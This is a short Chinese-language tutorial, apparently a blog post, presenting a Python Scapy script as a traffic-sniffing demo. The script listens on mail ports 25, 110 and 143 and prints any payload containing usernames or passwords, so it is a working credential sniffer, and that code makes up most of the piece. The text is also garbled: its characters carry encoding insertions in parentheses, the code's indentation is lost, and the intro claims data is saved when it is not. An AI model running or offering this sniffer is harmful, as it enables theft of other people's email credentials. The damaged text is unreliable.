Python 是一種非常流行的編程語言，有很多功能強大的庫可以使用。其中一個特別常用的庫是 Scapy，它是一款 Python 網(wǎng)絡(luò)包分析工具。

使用 Scapy 可以快速、準(zhǔn)確地捕獲和分析網(wǎng)絡(luò)數(shù)據(jù)包。以下是一個簡單的 Python 程序，演示如何使用 Scapy 進(jìn)行網(wǎng)絡(luò)流量嗅探和保存：

from scapy.all import *
def packet_callback(packet):
if packet[TCP].payload:
mail_packet = str(packet[TCP].payload)
if "user" in mail_packet.lower() or "pass" in mail_packet.lower():
print("[*] Server: %s" % packet[IP].dst)
print("[*] %s" % packet[TCP].payload)
def main():
sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0)
if __name__ == "__main__":
main()

在這個程序中，我們使用 Scapy 中的 sniff() 方法來嗅探在目標(biāo)端口上傳輸?shù)?TCP 數(shù)據(jù)包。我們指定了三個端口，smtp (25)、pop3 (110) 和 imap (143)，它們分別是用于發(fā)送和接收電子郵件的標(biāo)準(zhǔn)端口。

在嗅探到數(shù)據(jù)包時，我們會調(diào)用一個叫做 packet_callback() 的回調(diào)函數(shù)來處理它。該函數(shù)會檢查 TCP 數(shù)據(jù)包中是否包含用戶名或密碼信息，如果存在就輸出服務(wù)器地址和用戶名/密碼。

最后，我們調(diào)用 main() 函數(shù)來啟動嗅探。由于 store 參數(shù)被設(shè)置為 0，數(shù)據(jù)并不會被保存到硬盤上。

使用 Python 進(jìn)行網(wǎng)絡(luò)流量抓包非常方便，特別是使用 Scapy 這樣的庫。請注意，在使用此類工具時，一定要尊重其他人的隱私，并遵守相關(guān)法律法規(guī)。